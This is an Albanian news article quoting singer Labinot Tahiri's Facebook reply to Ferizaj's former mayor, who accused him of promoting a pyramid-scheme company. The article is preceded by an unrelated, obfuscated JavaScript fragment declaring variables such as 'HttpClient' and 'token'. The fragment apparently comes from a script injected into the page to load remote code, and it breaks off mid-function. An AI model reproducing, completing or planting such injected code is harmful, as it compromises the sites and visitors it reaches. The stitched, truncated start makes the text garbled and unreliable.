;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Labi replikon me ish-kryetarin: ‘Ne brezi i ri nuk do lejojmë të huaj e serbë të tallen me ne’

By

Këngëtari Labinot Tahiri është kryefjalë e mediave elektronike kohëve të fundit me aktivitetet e tij humane në të mirën e komunitetit.

Por duket se e gjithë kjo punë për t’u marrë shembull, nuk i ka pëlqyer të gjithëve e madje për disa shërbeu si burim i kritikave.

Ishte ish-kryetari i komunës së Ferizajt ai që në një postim me përplot gabime drejtshkrimore elementare të gjuhës shqipe konstatoi se Labi nuk ka njohuri për punën të cilës i ka hyrë.

E këngëtari ka replikuar përmes Facebook para pak minutash. Ky është postimi i tij i plotë:

Ju lutem media të nderuara e portale, mos ma hjekni asnjë shkronjë nga ky shkrim. Falëminderit!

Përshëndetje të nderuar qytetarë! Po shkruaj lidhur me akuzën e ish Kryetarit të nderuar, zotri Faik Grainca, tani Drejtor i Urbanizmit në Ferizaj! I nderuar, është e vërtetë se unë kam marr mirënjohje nga ana juaj në kohën kur ishte Kryetar në qytetin tonë gjë të cilën e çmoj shumë, por nuk ishe vetëm to sepse mua me dekoroi me mirënjohje edhe ish Kryetari i nderuar zotri Bajrush Gjemaili. Kjo u bë sipas vlerësimeve të juaja si qytetarë dhe artist i këtij qyteti dhe i të gjithëve, u jam mirënjohës! Nga ky moment, u kërkoj organëve të drejtësisë së Kosovës, që lirisht le të më hulumtojnë mua, ose po shkoj vetë të deklarohem për të më hulumtuar se a do të jem mashtrues i qytetarëve tanë! Unë u bëj thirrje edhe qytetarëve tanë që vetë të hulumtojnë rreth asaj kompanie, sepse ata nuk janë qytetarë të moshave të mitura por janë kogja të pjekur dhe të aftë që ti kuptojnë mashtrimet! Ju e dini mirë se pse unë mundohem të bëj mirë në këtë vend, sepse ne SHQIPTARËT E KOSOVËS dhe kemi mbetur njerëz pa respekt dhe duke u tallur i huaj e Serb me ne. Kjo nuk do të ndodh dhe nuk do ta lejojmë brezi i ri.

Miku im ju personalisht e dini se unë nuk rrjedhi nga familja mashtruese, dhe nuk jam i tillë!
E kuptoj shqetësimin tënd por nuk do e lejoj te rritet shqetësimi yt lidhur me këtë lloj angazhimi që kam. Keni boll shqetësime për të cilat duheni me u marr!
Unë nuk e luaj lojën e armiqësisë dhe urrejtjes ndaj nesh dhe partive politike, por përkundrazi mundohem që aq sa kam mundësi të jap kontributin tim si qytetarë duke u bërë vendin krenarë dhe me imazh të mirë në interes të përgjithshëm.
Mirupafshim deri në takimin e shpejt ku unë do i shpërndaj disa kontrata edhe pse nuk jam pjesë e kompanisë të cilën e keni quajtur si mashtruese piramidale!
Me respekt për ju dhe kuvendin komunal, LABINOT ISLAM TAHIRI!
Ferizaj, Kosovë e Shqipërisë
27 Janar 2016

 

Artikuj të ngjashëm